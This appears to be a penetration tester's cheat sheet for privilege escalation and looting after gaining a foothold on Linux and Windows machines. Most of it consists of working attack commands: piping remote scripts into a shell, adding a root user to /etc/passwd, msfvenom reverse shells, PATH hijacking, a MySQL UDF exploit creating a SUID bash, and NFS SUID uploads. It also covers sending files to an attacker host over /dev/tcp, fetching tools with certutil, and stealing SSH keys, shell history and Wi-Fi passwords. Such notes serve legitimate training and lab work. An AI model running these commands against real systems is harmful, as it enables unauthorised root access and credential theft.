What to do once you're on the Box¶
sudo -l will tell you what the user is allowed to execute with sudo without entering a password. Also keep an eye on the environment variables that are inherited (
Check if DLL Loading is possile.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null to find SUID, SGID files.
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh to get
the full information about the box, including files you're allowed to execute which has setuid flag set (sudo permissions).
You can also run another script
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh which is also very good!
You can also run
wget https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh; sh ./LinEnum.sh which is an alternative to linPEAS.
To switch between users, once you have the credentials, you can use
su <username> ->
Have a tough read which files/services can be executed as root from the current user and check with https://gtfobins.github.io/ how they can be exploted.
Here are the easiest ones.
Cookbooks for Privilege Escalations: * https://tryhackme.com/room/linuxprivesc * https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md * PayloadsAllTheThings - Methodology and Resources/Linux - Privilege Escalation.md * https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html * https://payatu.com/guide-linux-privilege-escalation
Writable /etc/passwd and /etc/shadow file¶
In case the
/etc/passwd is writable we can add another line to it, adding a new user as root.
In case the
/etc/shadow is writable you can replace password hashes.
The password hash is always between the first two colons like
There are several ways to generate a new hash.
openssl passwd -1 -salt <somesalt> <newpassword> # -1 = optional, indicates the use of md5s # -salt = optional, makes the hash immune against rainbow attacks
mkpasswd -m sha-512 <newpassword>
Add a new user to /etc/passwd
echo <username>:<passwordhash>:0:0:<optional comment>:/root:/bin/bash >> /etc/passwd
Escaping Vi Editor¶
vi is listed under the
sudo -l output, you can simply run
sudo vi and then
:!sh to have a root shell trough the editor.
cat /etc/crontab to see scheduled tasks, maybe one of them is exploitable.
Take a look at the environment variables defined in the crontab file, you could misled crontab by locating scripts.
In case a script is executed you can create a payload to create a bind/reverse shell with
msfvenom -p cmd/unix/reverse_netcat lhost=<local/remote ip> lport=8888 R. Don't forget to listen for it with
nc -lvnp 8888.
Exploiting PATH environment variable¶
The PATH environment variable, defined as
/path1:/path2:/path3, holds all paths where an executable is searched in. The current directory is not searched as in windows, except the PATH contains a
To exploit the PATH we need a SUID executable which calls another executable without a path information. Use
strings <executable> to get a hint if an executable name occurs or execute the executable and check with
top if a sub-executable is called at a certain time.
The next step is to create a bash script with the name of the called executable containing a bind/reverse shell or simply just
/bin/bash. Maybe it's requited to extend the PATH variable with
cd /tmp echo "/bin/bash" > ls chmod +x ls export PATH=/tmp:$PATH # execute the SUID file now
In case the mysql server is accessible and is executed as root, we can load a dynamic library that offers us root rights. https://www.exploit-db.com/exploits/1518
cd /home/user/tools/mysql-udf gcc -g -c raptor_udf2.c -fPIC gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root
use mysql; create table foo(line blob); insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; create function do_system returns integer soname 'raptor_udf2.so'; select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash'); exit
Upload SUID files via NFS¶
In case the victim server has network shares open (
nmap -p 135,445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP or via
cat /etc/exports) you can try to create a file on this share with the SUID bit set from the attacker server and execute it on the victim server.
Try to read the
/etc/exports file which contains the setting flags for each share.
no_root_squash flag means that the files uploaded via the share will remain their SUID bit, otherwise the SUID bit is set to "nobody".
# attacker box mkdir /tmp/nfs mount -o rw,vers=2 10.10.10.10:/share /tmp/nfs msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell chmod +xs /tmp/nfs/shell # victim box /tmp/shell
Kernel Exploits are one of the last ressorts to get higher privileges because it brings the target server in an unstable state.
Linux Exploit Suggester¶
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh chmod +x les.sh /les.sh
Each found exploit has a level which indicates how successful the attempt would be: * Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications. * Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target. * Less probable - additional manual analysis is needed to verify if kernel is affected. * Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
Linux Exploit Suggester 2¶
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl -O les2.pl perl les2.pl
Send files: VICTIM -> ATTACKER¶
nc -lvnp $PORT > /file_to_save
cat $FILE > /dev/tcp/$HOSTIP/$PORT
- RAW: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/winPEAS.bat" wp.bat
- RAW: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/PowerUp.ps1" pu.ps1 . ./pu.ps1 Invoke-AllChecks
- Check if you can escalate with Priv2Admin
- See if you can create an hidden system account with CreateHiddenAccount
Migrate to another process:
ps to get processes thats stable (eg. explorer)
psinject Listener ProcessID with processid and listener
Get windows build number:
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId
If build is < Win10 2004, try
powershell/privesc/printdemon (CVE-2020-1048) with the base64 part of the stager and
shell restart-computer -force for higher privilege.
Get the Loot¶
Get the ssh key!¶
cat ~/.ssh/id_rsa cat /root/.ssh/id_rsa
Get the history of an user¶
cat ~/.*history | less
Get config files¶
Search the user's home directory with
ls -la and see if you can find configuration
Get wlan/wifi passwords on a windows machine (no admin priv needed)¶
netsh wlan export profile key=clear